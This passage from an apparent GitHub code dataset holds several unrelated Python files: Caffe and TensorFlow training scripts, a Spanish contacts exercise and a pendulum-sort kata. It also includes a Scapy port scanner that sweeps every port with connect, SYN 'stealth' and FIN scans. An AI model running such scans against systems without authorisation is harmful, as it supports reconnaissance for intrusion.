MESSAGE   : {m}', m=m)\n            
self.log.info('-----------------------------------------------')\n self.do_next()\n\n d.addCallback(ok)\n d.addErrback(err)\n d.addBoth(both)\n\n\nPLUGIN = ServerCommand\n","repo_name":"sveinse/lumina","sub_path":"lumina/plugins/test/server_command.py","file_name":"server_command.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"20187601138","text":"import sys\nsys.path.insert(0,'caffe_ext/python');\nimport utils as ut;\nfrom multiprocessing import Process, Queue, Pool\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os, subprocess, time, math, random, shutil, signal, glob, re\nfrom caffe import layers as L, params as P, to_proto, NetSpec, get_solver, Net\nfrom caffe.proto import caffe_pb2\nimport caffe\nimport deepcontext_config\n\n# Basic Configuration\npatch_sz=(96,96) # size of sampled patches\nbatch_sz=512 # max patches in a single batch\ngap = 48 # gap between patches\nnoise = 7 # jitter by at most this many pixels\n\ndef netset(n, nm, l):\n setattr(n, nm, l);\n return getattr(n,nm);\n\ndef conv_relu(n, bottom, name, ks, nout, stride=1, pad=0, group=1, \n batchnorm=False, weight_filler=dict(type='xavier')):\n conv = netset(n, 'conv'+name, L.Convolution(bottom, kernel_size=ks, stride=stride, \n num_output=nout, pad=pad, group=group, \n weight_filler=weight_filler))\n convbatch=conv;\n if batchnorm:\n batchnorm = netset(n, 'bn'+name, L.BatchNorm(conv, in_place=True, \n param=[{\"lr_mult\":0},{\"lr_mult\":0},{\"lr_mult\":0}]));\n convbatch = batchnorm\n # Note that we don't have a scale/shift afterward, which is different from\n # the original Batch Normalization layer. Using a scale/shift layer lets\n # the network completely silence the activations in a given layer, which\n # is exactly the behavior that we need to prevent early on.\n relu=netset(n, 'relu'+name, L.ReLU(convbatch, in_place=True))\n return conv, relu \n\ndef fc_relu(n, bottom, name, nout, batchnorm=False):\n fc = netset(n, 'fc'+name, L.InnerProduct(bottom, num_output=nout, \n weight_filler = dict(type='xavier')))\n fcbatch=fc;\n if batchnorm:\n batchnorm = netset(n, 'bn'+name, L.BatchNorm(fc, in_place=True,\n param=[{\"lr_mult\":0},{\"lr_mult\":0},{\"lr_mult\":0}]));\n fcbatch = batchnorm\n relu = netset(n, 'relu'+name, L.ReLU(fcbatch, in_place=True));\n return fc, relu\n\ndef max_pool(bottom, ks, stride=1):\n return L.Pooling(bottom, pool=P.Pooling.MAX, kernel_size=ks, stride=stride)\n\ndef caffenet_stack(data, n, use_bn=True):\n conv_relu(n, data, '1', 11, 96, stride=4, pad=5)\n n.pool1 = max_pool(n.relu1, 3, stride=2)\n n.norm1 = L.LRN(n.pool1, local_size=5, alpha=1e-4, beta=0.75)\n conv_relu(n, n.norm1, '2', 5, 256, pad=2)\n n.pool2 = max_pool(n.relu2, 3, stride=2)\n n.norm2 = L.LRN(n.pool2, local_size=5, alpha=1e-4, beta=0.75)\n conv_relu(n, n.norm2, '3', 3, 384, pad=1, batchnorm=use_bn)\n conv_relu(n, n.relu3, '4', 3, 384, pad=1, batchnorm=use_bn)\n conv_relu(n, n.relu4, '5', 3, 256, pad=1, batchnorm=use_bn)\n n.pool5 = max_pool(n.relu5, 3, stride=2)\n fc_relu(n, n.pool5, '6', 4096, batchnorm=use_bn)\n\ndef gen_net(batch_size=512, use_bn=True):\n n=NetSpec();\n n.data = L.DummyData(shape={\"dim\":[batch_size,3,96,96]})\n n.select1 = L.DummyData(shape={\"dim\":[2]})\n n.select2 = L.DummyData(shape={\"dim\":[2]})\n n.label = L.DummyData(shape={\"dim\":[2]})\n caffenet_stack(n.data, n, use_bn)\n n.first = L.BatchReindex(n.relu6, n.select1)\n n.second = L.BatchReindex(n.relu6, n.select2)\n 
n.fc6_concat=L.Concat(n.first, n.second);\n\n fc_relu(n, n.fc6_concat, '7', 4096, batchnorm=use_bn);\n fc_relu(n, n.relu7, '8', 4096);\n n.fc9 = L.InnerProduct(n.relu8, num_output=8,\n weight_filler=dict(type='xavier'));\n n.loss = L.SoftmaxWithLoss(n.fc9, n.label, loss_param=dict(normalization=P.Loss.NONE));\n\n prot=n.to_proto()\n prot.debug_info=True\n return prot;\n\n# image preprocessing. Note that the input image will modified.\ndef prep_image(im):\n\n # for some patches, randomly downsample to as little as 100 total pixels\n if(random.random() < .33):\n origsz=im.shape\n randpix=int(math.sqrt(random.random() * (95 * 95 - 10 * 10) + 10 * 10))\n im=caffe.io.resize(im.astype(np.uint8), (randpix, randpix))\n im=(caffe.io.resize(im, (origsz[0], origsz[1])) * 255).astype(np.float32)\n\n # randomly drop all but one color channel\n chantokeep=random.randint(0, 2);\n mean=[123, 117, 104]\n for i in range(0, 3):\n if i==chantokeep:\n im[:,:,i]-=np.mean(im[:,:,i])\n else:\n im[:,:,i]=np.random.uniform(0, 1, (im.shape[0], im.shape[1])) - .5\n\n # Normalize the mean and variance so that gradients are a less useful cue;\n # then scale by 50 so that the variance is roughly the same as the usual\n # AlexNet inputs.\n im=im / np.sqrt(np.mean(np.square(im))) * 50\n return im.transpose(2, 0, 1)\n\n# Sample a patch. This function defines a grid over the image of patches\n# of size patch_sz with a gap of gap between the patches. The upper-left\n# corner of the grid starts at (gridstartx, gridstarty). We then sample\n# the patch at location (x, y) on this grid, jitter by up to noisehalf in\n# every direction. im_shape is the dimensions of the image; an error\n# is thrown if (x, y) refers to a patch outside the image frame. \n#\n# Returns the coordinates of the sampled patch's upper left corner.\ndef sample_patch(x, y, gridstartx, gridstarty, patch_sz, gap, noisehalf, \n im_shape):\n xpix = gridstartx + x * (patch_sz[1] + gap) \\\n + random.randint(-noisehalf, noisehalf)\n xpix2 = min(max(xpix, 0), im_shape[1] - patch_sz[1])\n ypix = gridstarty + y * (patch_sz[0] + gap) \\\n + random.randint(-noisehalf, noisehalf)\n ypix2 = min(max(ypix, 0), im_shape[0] - patch_sz[0])\n assert abs(xpix - xpix2) < gap\n assert abs(ypix - ypix2) < gap\n return (xpix2 , ypix2)\n\n# A background thread which loads images, extracts pairs of patches, arranges\n# them into batches.\n#\n# args:\n# dataq: A queue object where the batches of data will be sent. Batches\n# consist of a tuple of: \n# (1) a 4-d array of of N patches, or a filename of\n# a file containing the data,\n# (2) a list of pairs of patches to be used as training examples, kept in\n# an array of shape N-by-2,\n# (3) an array of labels for each pair, which are in the range 0-7.\n#\n# batch_sz: max number of patches go in each batch\n# imgs: a list of images (see load_imageset)\n# tmpdir: if not None, data batches will be saved here and the resulting\n# filename will be sent through the queue rather than the data. 
\n# seed: a seed for the random number generator, required so that different\n# processes produce images in a different order:\n# tid: thread id for use in filenames.\n# patch_sz: size of sampled patches\ndef imgloader(dataq, batch_sz, imgs, tmpdir, seed, tid, patch_sz): \n qctr = 0\n curidx = 0\n # order for going through the images\n np.random.seed(seed)\n imgsord=np.random.permutation(len(imgs['filename']))\n # sample this many grids per image \n num_grids = 4\n gridctr = 0\n # storage for the sampled batch\n perm = []\n label = []\n pats = []\n # index within the current batch\n j = 0;\n # keep returning batches forever. Each iteration of this loop\n # samples one grid of patches from an image.\n while True:\n # if we've already sampled num_grids in this image, we sample a new one.\n if(gridctr==0):\n while True:\n try:\n im=ut.get_resized_image(imgsord[curidx % len(imgs['filename'])],\n imgs,\n {\"gri_targpixels\":random.randint(150000,450000)})\n except:\n curidx = (curidx + 1) % (len(imgsord))\n print(\"broken image id \" + str(curidx))\n continue;\n curidx = (curidx + 1) % (len(imgsord));\n if(im.shape[0] > patch_sz[0] * 2 + gap + noise and \n im.shape[1] > patch_sz[1] * 2 + gap + noise):\n break\n gridctr = num_grids;\n # compute where the grid starts, and then comptue its size.\n gridstartx = random.randint(0, patch_sz[1] + gap - 1)\n gridstarty = random.randint(0, patch_sz[0] + gap - 1)\n gridszx = int((im.shape[1] + gap-gridstartx) / (patch_sz[1] + gap))\n gridszy = int((im.shape[0] + gap-gridstarty) / (patch_sz[0] + gap))\n # Whenever we sample and store a patch, we'll put its index in this\n # variable so it's easy to pair it up later.\n grid=np.zeros((gridszy, gridszx), int)\n\n # if we can't fit the current grid into the batch without going over\n # batch_sz, put the batch in the queue and reset.\n if(gridszx * gridszy + j >= batch_sz):\n pats=map(prep_image, pats)\n data=np.array(pats)\n qctr+=1\n perm=(np.array(perm))\n label=(np.array(label))\n if tmpdir is None:\n dataq.put((np.ascontiguousarray(data), perm, label), timeout=600)\n else:\n fnm=tmpdir + str(tid) + '_' + str(qctr) + '.npy'\n np.save(fnm, data)\n dataq.put((fnm, perm, label), timeout=600)\n perm=[]\n label=[]\n pats=[]\n j=0\n\n gridctr-=1;\n # for each location in the grid, sample a patch, search up and to the\n # left for patches that can be paired with it, and add them to the batch.\n for y in range(0,gridszy):\n for x in range(0,gridszx):\n (xpix, ypix)=sample_patch(x, y, gridstartx, gridstarty, patch_sz, \n gap, noise, im.shape)\n pats.append(np.copy(\n im[ypix:ypix + patch_sz[0], xpix:xpix + patch_sz[1], :]*255));\n grid[y, x] = j;\n for pair in [(-1,-1), (0,-1), (1,-1), (-1,0)]:\n gridposx = pair[0] + x;\n gridposy = pair[1] + y;\n if(gridposx < 0 or gridposy < 0 or gridposx >= gridszx):\n continue;\n perm.append(np.array([j, grid[gridposy, gridposx]]));\n label.append(pos2lbl(pair));\n perm.append(np.array([grid[gridposy, gridposx],j]))\n label.append(pos2lbl((-pair[0],-pair[1])));\n j+=1;\n\n# convert an (x, y) offset into a single number to use as a label. 
Labels are:\n# 1 2 3\n# 4 5\n# 6 7 8\ndef pos2lbl(pos):\n (posx, posy)=pos;\n if(posy==-1):\n lbl = posx + 1;\n elif(posy == 0):\n lbl = (posx + 7) / 2\n else:\n assert(posy == 1);\n lbl = posx + 6;\n return lbl;\n\n# will set these later, need to make it global for signal handler\nif 'exp_name' not in locals():\n exp_name='';\ndef signal_handler(signal, frame):\n print(\"PYCAFFE IS NOT GUARANTEED TO RETURN CONTROL TO PYTHON WHEN \" +\n \"INTERRUPTED. That means I can't necessarily clean up temporary files \" +\n \"and spawned processes. \" +\n \"You were lucky this time. Run deepcontext_quit() to quit. Next time touch \" + \n exp_name + '_pause to pause safely and ' + exp_name + '_quit to quit.')\n\n# return a dict containing two fields 'dir' (a string) and 'filename' (a list \n# of strings) such that\n# scipy.misc.imread(imgs['dir'] + imgs['filename'][idx]) will return\n# an image. Make sure the order of imgs['filename'] is deterministic, since\n# the code uses the index in this list as an ID for each image.\ndef load_imageset():\n datadir=deepcontext_config.imagenet_dir;\n imgs={};\n imgs['dir']=datadir+'train/';\n names=[];\n with open(datadir + 'train.txt', 'rb') as f:\n for line in f:\n row=line.split();\n names.append(row[0]);\n imgs['filename']=names;\n return imgs;\n\n# The main code body. \ntry:\n if 'solver' not in locals():\n exp_name=ut.mfilename();\n # all generated files will be here.\n outdir = deepcontext_config.out_dir + '/' + exp_name + '_out/';\n if deepcontext_config.tmp_dir:\n tmpdir = deepcontext_config.tmp_dir + '/' + exp_name + '_out/';\n else:\n tmpdir = None\n if not os.path.exists(outdir):\n os.mkdir(outdir);\n else:\n try:\n input=raw_input;\n except:\n pass;\n print('=======================================================================');\n print('Found old data. Load most recent snapshot and append to log file (y/N)?');\n inp=input('======================================================================');\n if not 'y' == inp.lower():\n raise RuntimeError(\"User stopped execution\");\n \n if not os.path.exists(tmpdir):\n os.makedirs(tmpdir);\n # by default, we append to the logfile if it's already there.\n #if os.path.exists(outdir + \"out.log\"):\n # os.remove(outdir + \"out.log\")\n\n # Magic commands to redirect standard output and standard\n # error to a log file for easy plotting of the loss function. Note that\n # running these commands will screw up your terminal; hence why the whole\n # code is wrapped in a try/finally statement that puts things back the way\n # they were.\n prevOutFd = os.dup(sys.stdout.fileno())\n prevErrFd = os.dup(sys.stderr.fileno()) \n tee = subprocess.Popen([\"tee\", \"-a\", outdir + \"out.log\"], stdin=subprocess.PIPE)\n os.dup2(tee.stdin.fileno(), sys.stdout.fileno())\n os.dup2(tee.stdin.fileno(), sys.stderr.fileno())\n\n # if the solver hasn't been set up yet, do so now. 
Otherwise assume that \n # we're continuing.\n if 'solver' not in locals():\n if os.path.isfile(exp_name + '_pause'):\n os.remove(exp_name + '_pause')\n if os.path.isfile(exp_name + '_quit'):\n os.remove(exp_name + '_quit')\n\n with open(outdir+'network.prototxt','w') as f:\n f.write(str(gen_net()));\n with open(outdir+'network_no_bn.prototxt','w') as f:\n f.write(str(gen_net(use_bn=False)));\n\n ut.mkorender('solver_mko.prototxt', outdir + 'solver.prototxt', \n base_lr=1e-5, outdir=outdir, weight_decay=0)\n\n print('setting gpu')\n caffe.set_mode_gpu();\n print('constructing solver')\n solver = caffe.get_solver(outdir + 'solver.prototxt');\n\n # Find earlier solvers and restore them\n fils=glob.glob(outdir + 'model_iter_*.solverstate');\n if(len(fils)>0):\n idxs=[];\n for f in fils:\n idxs.append(int(re.findall('\\d+',os.path.basename(f))[0]));\n idx=np.argmax(np.array(idxs));\n solver.restore(outdir + os.path.basename(fils[idx]));\n\n # we occasionally read out the parameters in this list and save the norm\n # of the update out to disk, so we can make sure they're updating at\n # the right speed.\n track=[];\n for bl in solver.net.params:\n if not 'bn' in bl:\n track.append(bl);\n nrm=dict();\n intval={};\n trackold={};\n for tracknm in track:\n intval[tracknm]=[];\n nrm[tracknm]=[];\n\n curstep = 0;\n\n # load the images\n imgs=load_imageset();\n\n # start the data prefetching threads.\n dataq=[]\n procs=[]\n i=0\n for i in range(0,3):\n dataq.append(Queue(5))\n procs.append(Process(target=imgloader, \n args=(dataq[-1], batch_sz, imgs, tmpdir,\n (hash(outdir)+i) % 1000000, #random seed\n i, patch_sz)))\n procs[-1].start()\n def deepcontext_quit():\n for proc in procs:\n proc.terminate()\n time.sleep(2)\n shutil.rmtree(tmpdir)\n os.kill(os.getpid(), signal.SIGKILL)\n signal.signal(signal.SIGINT, signal_handler)\n \n # The main loop over batches.\n while True:\n start=time.time();\n (datafnm, perm, label)=dataq[curstep % len(dataq)].get(timeout=600)\n print(\"queue size: \" + str(dataq[curstep % len(dataq)].qsize()))\n\n if(tmpdir is None):\n d=datafnm\n else:\n d=np.load(datafnm,mmap_mode='r')\n os.remove(datafnm)\n\n # input the patch data\n solver.net.blobs['data'].reshape(*d.shape)\n solver.net.blobs['data'].data[:]=d[:]\n\n # input the patch pairings\n solver.net.blobs['select1'].reshape(*(perm.shape[0],))\n solver.net.blobs['select1'].data[:]=perm[:,0]\n solver.net.blobs['select2'].reshape(*(perm.shape[0],))\n solver.net.blobs['select2'].data[:]=perm[:,1]\n\n # input the labels\n solver.net.blobs['label'].reshape(*label.shape)\n solver.net.blobs['label'].data[:]=label\n\n print(\"data input time: \" + str(time.time()-start));\n\n # take a step\n solver.step(1)\n print(\"norm_loss: \" + str(solver.net.blobs['loss'].data /\n (label.shape[0])));\n print(\"solver step time: \" + str(time.time() - start));\n dobreak=False;\n broken=[];\n \n msg = (' Please examine the situation and re-execute ' + exp_name + \n '.py to continue.')\n if curstep % 100 == 0:\n start = time.time()\n print(\"getting param statistics...\")\n for tracknm in track:\n try:\n intval[tracknm].append(np.sqrt(np.sum(np.square(\n solver.net.params[tracknm][0].data - trackold[tracknm]))));\n if (intval[tracknm][-1] > 10 * intval[tracknm][-2] \n and curstep > 100) \\\n or np.isnan(intval[tracknm][-1]):\n print(tracknm + \" changed a suspiciously large amount.\" + msg)\n dobreak = True; \n broken.append(tracknm);\n except:\n print(\"init \" + tracknm + \" statistics\")\n 
trackold[tracknm]=np.copy(solver.net.params[tracknm][0].data);\n        nrmval=np.sqrt(np.sum(solver.net.params[tracknm][0].data * \n                             solver.net.params[tracknm][0].data))\n        nrm[tracknm].append(nrmval);\n      np.save(outdir + 'intval',intval);\n      np.save(outdir + 'nrm',nrm);\n      print(\"param statistics time: \" + str(time.time()-start));\n\n      val = np.sum(solver.net.params[\"fc8\"][0].data);\n      if np.isnan(val) or val > 1e10:\n        print(\"fc8 activations look broken to me.\" + msg)\n        dobreak = True;\n      val2 = np.max(np.abs(solver.net.blobs[\"pool1\"].diff));\n      if np.isnan(val2) or val2 > 1e8:\n        print(\"pool1 diffs look broken to me.\" + msg)\n        dobreak = True;\n\n    curstep += 1;\n    if dobreak:\n      break;\n    if os.path.isfile(exp_name + '_pause'):\n      break;\n    if os.path.isfile(exp_name + '_quit'):\n      # Need to kill the subprocesses and delete the temporary files.\n      deepcontext_quit();\nexcept KeyboardInterrupt:\n  if 'procs' in locals():\n    handler(None,None)\n  raise;\nfinally:\n  if 'prevOutFd' in locals():\n    os.dup2(prevOutFd, sys.stdout.fileno())\n    os.close(prevOutFd)\n    os.dup2(prevErrFd, sys.stderr.fileno())\n    os.close(prevErrFd)\n","repo_name":"cdoersch/deepcontext","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17965,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"50"} +{"seq_id":"42302236399","text":"import tensorflow as tf\nfrom Core.Task import Task\nimport os\nfrom food101 import get_food101_data\nfrom tensorflow.keras.callbacks import ModelCheckpoint, CSVLogger\nfrom tools.visualization.training_visualization_tool import plot_training_result\nfrom cyclic import CyclicLR\n\n\nclass Food101Task(Task):\n    def __init__(self, config):\n        super().__init__(config)\n\n    def prepare_model(self, type=\"vgg16\", filename=None):\n        if filename is not None:\n            foldername = self.config['Model']['model_folder']\n            filename = os.path.join(foldername, filename)\n            model = tf.keras.models.load_model(filename)\n            return model\n        else:\n            if type == \"vgg16\":\n                from vgg16 import VGG16 \n                model = VGG16(input_shape=[224, 224, 3], num_classes=20)\n            elif type == \"resnet\":\n                from resnet import ResNet50\n                model = ResNet50(input_shape=[224, 224, 3], num_classes=20)\n            elif type == \"mobilenet_v2\":\n                from mobilenet_v2 import MobileNetV2_avg_max\n                model = MobileNetV2_avg_max(input_shape=[224, 224, 3], num_classes=20)\n            return model\n    \n    def get_dataset(self):\n        ds_path = self.config['Datasets']['dataset_folder']\n        train_data, valid_data = get_food101_data(\n                dataset_dir=ds_path,\n                bs=32)\n        return train_data, valid_data\n    \n    def train(self, model, model_name='fine_tuned_model.h'):\n        train_data, valid_data = self.get_dataset()\n        foldername = self.config['Model']['model_folder']\n        acc1 = tf.keras.metrics.TopKCategoricalAccuracy(\n            k=1, name=\"top1\", dtype=None)\n        acc5 = tf.keras.metrics.TopKCategoricalAccuracy(\n            k=5, name='top_k_categorical_accuracy', dtype=None)\n\n        initial_learning_rate = 1e-5\n        maximal_learning_rate = 1e-3\n        NUM_CLR_CYCLES = 2\n        step_size = train_data.n/NUM_CLR_CYCLES/2\n\n        opt = tf.keras.optimizers.SGD(lr=initial_learning_rate, momentum=0.9)\n        clr = CyclicLR(\n            base_lr=initial_learning_rate,\n            max_lr=maximal_learning_rate,\n            step_size=step_size)\n\n        model.compile(\n            optimizer=opt,\n            loss=\"categorical_crossentropy\",\n            metrics=[acc1, acc5])\n\n        checkpointer = ModelCheckpoint(\n            filepath=foldername,\n            verbose=1,\n            monitor='val_top1',\n            mode='max',\n            save_best_only=True)\n\n        early_stopper = tf.keras.callbacks.EarlyStopping(\n            monitor=\"val_top1\", patience=3, mode=\"max\"\n        )\n        csv_logger = CSVLogger(csv_path)\n        with tf.device('/gpu:0'):\n            history = model.fit_generator(\n                train_data,\n                validation_freq=1,\n                validation_data=valid_data,\n                epochs=30,\n                verbose=1,\n                callbacks=[csv_logger, checkpointer, clr, early_stopper])\n\n        plot_training_result(history, clr, foldername)\n        model.save(os.path.join(foldername, \"trained_model.h5\"))","repo_name":"wei2374/model_compression","sub_path":"demo/food20/Food101Task.py","file_name":"Food101Task.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11697775535","text":"import os\nimport sys\nimport logging\nimport socket\nfrom scapy.all import *\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nsrc_port = RandShort()\n\n# Take arguments\ntry: \n    TARGET_HOST = sys.argv[1]\n    SCAN_MODE = sys.argv[2]\nexcept IndexError:\n    print(\"Usage: python port_scanner.py [TARGET IPv4 ADDR] [SCAN MODE]\")\n    print(\"Scan mode options: CONNECT, STEALTH, FIN (case-insensitive)\")\n    sys.exit()\n\n# Check if host is resolvable:\ntry:\n    socket.gethostbyname(TARGET_HOST)\nexcept socket.gaierror:\n    print(\"Cannot resolve hostname provided.\")\n\ndef connect_scan(host, dst_port):\n    tcp_scan_resp = sr1( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"S\"), verbose=0, timeout=1 )\n    if(tcp_scan_resp != None):\n        pktflags = (tcp_scan_resp.getlayer(TCP).flags)\n        if(pktflags == \"SA\"): # SYNACK\n            rst = sr( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"AR\"), verbose=0, timeout=1 )\n            return \"OPEN\"\n\n        if(pktflags == \"RA\"): # RSTACK\n            return \"CLOSED\"\n    else:\n        return \"CLOSED\"\n\ndef stealth_scan(host, dst_port):\n    tcp_scan_resp = sr1( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"S\"), verbose=0, timeout=1 )\n    if(tcp_scan_resp != None): \n        pktflags = (tcp_scan_resp.getlayer(TCP).flags)\n        if(pktflags == \"SA\"): # SYNACK\n            rst = sr( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"R\"), verbose=0, timeout=1 )\n            return \"OPEN\"\n\n        if(pktflags == \"RA\"): # RSTACK\n            return \"CLOSED\"\n    else:\n        return \"CLOSED\"\n\ndef fin_scan(host, dst_port):\n    tcp_scan_resp = sr1( IP(dst = host) / TCP(sport=src_port, dport=dst_port, flags=\"F\"), verbose=0, timeout=1 )\n    if(tcp_scan_resp != None):\n        pktflags = (tcp_scan_resp.getlayer(TCP).flags)\n        if(pktflags == \"RA\"): # RSTACK\n            return \"CLOSED\"\n    else:\n        return \"OPEN\"\n\nSTART_TIME = datetime.now()\nprint(\"\\n* Start port scan at \" + str(START_TIME) )\nprint(\"* Notable open ports on \" + TARGET_HOST + \"...\")\nprint(\"-\"*55)\nprint(\"| {:^15} | {:^15} | {:^15} |\".format(\"PORT\", \"STATE\",\"SERVICE\"))\nprint(\"-\"*55)\n\nclosed = 0 \nfor x in range(1, 65535):\n    #print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), fin_scan(TARGET_HOST, x), socket.getservbyport(x)))\n    try:\n        if(SCAN_MODE.upper() == \"CONNECT\"): \n            if(connect_scan(TARGET_HOST, x) == \"OPEN\"): print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), connect_scan(TARGET_HOST, x), socket.getservbyport(x)))\n            else: closed+=1\n\n        elif(SCAN_MODE.upper() == \"STEALTH\"): \n            if(stealth_scan(TARGET_HOST, x) == \"OPEN\"): print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), stealth_scan(TARGET_HOST, x), socket.getservbyport(x)))\n            else: closed+=1\n        \n        elif(SCAN_MODE.upper() == \"FIN\"): \n            if(fin_scan(TARGET_HOST, x) == \"OPEN\"): print(\"| {:^15} | {:^15} | {:^15} |\".format(str(x), fin_scan(TARGET_HOST, x), socket.getservbyport(x)))\n            else: closed+=1\n\n        else:\n            print(\"| {:^51} |\".format(\"INCORRECT CONNECTION METHOD.\"))\n            print(\"-\"*55)\n            sys.exit()\n    except OSError:\n        pass\n\nprint(\"-\"*55)\nprint(\"* Elapsed time: \" + str(datetime.now() - START_TIME))\nprint(\"* Not shown: \" + str(closed) + \" closed ports. The rest do not have a service associated.\")","repo_name":"maxineauma/port_scanner","sub_path":"port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27726035700","text":"agenda_dicc = {\r\n    '01234567L':\r\n        {'dni': '01234567L', 'nombre': 'Luis González', 'email': 'luisgonzalez@mail.com', 'teléfono': '656343576',\r\n         'descuento': 12.5},\r\n    '71476342J':\r\n        {'dni': '71476342J', 'nombre': 'Macarena Ramírez', 'email': 'macarena@mail.com', 'teléfono': '692839321',\r\n         'descuento': 8.0},\r\n    '63823376M':\r\n        {'dni': '63823376M', 'nombre': 'Juan José Martínez', 'email': 'juanjo@mail.com', 'teléfono': '664888233',\r\n         'descuento': 5.2},\r\n    '98376547F':\r\n        {'dni': '98376547F', 'nombre': 'Carmen Sánchez', 'email': 'carmen@mail.com', 'teléfono': '667677855',\r\n         'descuento': 15.7}\r\n}\r\n\r\nagenda_lista = [\r\n    {'dni': '01234567L', 'nombre': 'Luis González', 'email': 'luisgonzalez@mail.com', 'teléfono': '656343576',\r\n     'descuento': 12.5},\r\n    {'dni': '71476342J', 'nombre': 'Macarena Ramírez', 'email': 'macarena@mail.com', 'teléfono': '692839321',\r\n     'descuento': 8.0},\r\n    {'dni': '63823376M', 'nombre': 'Juan José Martínez', 'email': 'juanjo@mail.com', 'teléfono': '664888233',\r\n     'descuento': 5.2},\r\n    {'dni': '98376547F', 'nombre': 'Carmen Sánchez', 'email': 'carmen@mail.com', 'teléfono': '667677855',\r\n     'descuento': 15.7}\r\n]\r\n\r\n# print(agenda_lista, agenda_dicc)\r\n\r\ntexto = \"\"\"dni;nombre;email;teléfono;descuento\r\n01234567L;Luis González;luisgonzalez@mail.com;656343576;12.5\r\n71476342J;Macarena Ramírez;macarena@mail.com;692839321;8\r\n63823376M;Juan José Martínez;juanjo@mail.com;664888233;5.2\r\n98376547F;Carmen Sánchez;carmen@mail.com;667677855;15.7\"\"\"\r\n\r\n# Printer lista de manera bonita:\r\n#\r\n# for persona in agenda_lista:\r\n#     for (clave,valor) in persona.items():\r\n#         print(f\"{clave} -> {valor}\", end=\" \\n\")\r\n#     print(\"=============================\")\r\n#\r\n\r\n# ============= Otra forma =======================\r\n#\r\n# for persona in agenda_lista:\r\n#     for atributo in persona.items():\r\n#         print(f\"{atributo[0]} -> {atributo[1]}\", end=\" \\n\")\r\n#     print(\"=============================\")\r\n#\r\n\r\n# Printer de la agenda de manera bonita:\r\n#\r\n# for agenda in agenda_dicc.values():\r\n#     for atributo in agenda.items():\r\n#         print(f\"{atributo[0]} -> {atributo[1]}\", end=\" \\n\")\r\n#     print(\"=============================\")\r\n#\r\n\r\n# Para conseguir un valor del diccionario:\r\n#\r\n# dni = input(\"Dime el dni de la persona a buscar: \")\r\n# print(agenda_dicc.get(dni, \"Ese dni no esta en la base de datos\"))\r\n\r\n# Para hacerlo en la lista es mas complejo\r\n#\r\n# dni = input(\"Dime el dni de la persona a buscar: \")\r\n# buscado = None\r\n#\r\n# for persona in agenda_lista:\r\n#     if (persona['dni'] == dni):\r\n#         # Se puede printear directamente.\r\n#         # print(persona)\r\n#         # Tambien hacer una copia e imprimir al final del bucle\r\n#         buscado = {**persona}\r\n#         break # Se puede usar para parar el bucle !\r\n#\r\n# if buscado is None:\r\n#     print(\"Ese DNI no esta en la base de datos.\")\r\n# else:\r\n#     
print(buscado)\r\n\r\n# 27.1\r\n#\r\n#\r\n# todo = []\r\n# diccionario = dict()\r\n#\r\n# lineas = texto.split(\"\\n\")\r\n# cabecera = lineas[0].split(\";\")\r\n#\r\n# for i in range(1,len(lineas)):\r\n# datos = lineas[i].split(\";\")\r\n# conjunto = dict(zip(cabecera, datos))\r\n# conjunto['descuento'] = float(conjunto['descuento'])\r\n# todo.append(conjunto)\r\n#\r\n# print(todo)\r\n\r\n# 27.1 Atencion a como recorre la lista en este ejemplo: !!\r\n\r\n# todo = []\r\n# diccionario = dict()\r\n#\r\n# lineas = texto.split(\"\\n\")\r\n# cabecera = lineas[0].split(\";\")\r\n#\r\n# for linea in lineas[1:]:\r\n# datos = lineas.split(\";\")\r\n# conjunto = dict(zip(cabecera, datos))\r\n# todo.append(conjunto)\r\n\r\n# print(todo)\r\n\r\n# 27.2\r\n\r\n\r\n# diccionario = dict()\r\n# diccinario2 = dict()\r\n#\r\n# lineas = texto.split(\"\\n\")\r\n# cabecera = lineas[0].split(\";\")\r\n#\r\n# for i in range(1,len(lineas)):\r\n# datos = lineas[i].split(\";\")\r\n# diccinario2 = dict(zip(cabecera, datos))\r\n# diccionario[datos[0]]=diccinario2\r\n#\r\n# print(diccionario)\r\n\r\n# 27.2 Dani\r\n\r\nagenda_dicc = dict()\r\nlineas = texto.split(\"\\n\")\r\ncabecera = lineas[0].split(\";\")\r\n\r\nfor linea in lineas[1:]: # <--- Atento a esto !\r\n datos = linea.split(\";\")\r\n persona = dict(zip(cabecera, datos))\r\n persona[\"descuento\"] = float(persona[\"descuento\"])\r\n agenda_dicc[persona[\"dni\"]] = persona\r\n\r\nprint(agenda_dicc)\r\n","repo_name":"Ismaelbase/sistemas-de-gestion-empresarial","sub_path":"Tema 3 - Inicio Python/Ejercicios/Ejercicio 27/estructuras_complejas.py","file_name":"estructuras_complejas.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"38349058243","text":"\"\"\"\nDescription:\nGiven an array/list [] of n integers , Arrange them in a way similar to the to-and-fro movement of a Pendulum\n\n - The Smallest element of the list of integers , must come in center\n position of array/list.\n - The Higher than smallest , goes to the right .\n\n - The Next higher number goes to the left of minimum number and So on,\n in a to-and-fro manner similar to that of a Pendulum.\n\n\"\"\"\n\n\ndef pendulum(values):\n values.sort()\n res = [0 for _ in range(len(values))]\n begin = len(values) // 2\n if len(values) % 2:\n begin = len(values) // 2\n res[begin] = values[0]\n for i in range(1, len(values)):\n if i % 2:\n res[begin + (i + 1) // 2] = values[i]\n else:\n res[begin - (i + 1) // 2] = values[i]\n else:\n begin = (len(values) - 1) // 2\n for i in range(len(values)):\n if i % 2:\n res[begin + (i + 1) // 2] = 